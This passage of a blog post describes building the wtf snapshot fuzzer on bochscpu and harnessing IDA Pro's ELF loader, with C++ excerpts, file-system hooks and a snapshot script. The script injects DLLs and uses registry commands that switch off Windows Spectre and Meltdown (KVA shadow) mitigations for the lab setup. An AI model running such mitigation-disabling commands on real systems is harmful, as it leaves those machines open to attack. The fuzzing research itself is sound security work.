The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

No need to load an entire dump of memory inside the emulator when it starts,
Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
GVA: Guest virtual address. This is guest virtual memory.
HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
we populate its content using the crash dump.
we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
The -B option allows running IDA in batch-mode from the command line,
TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
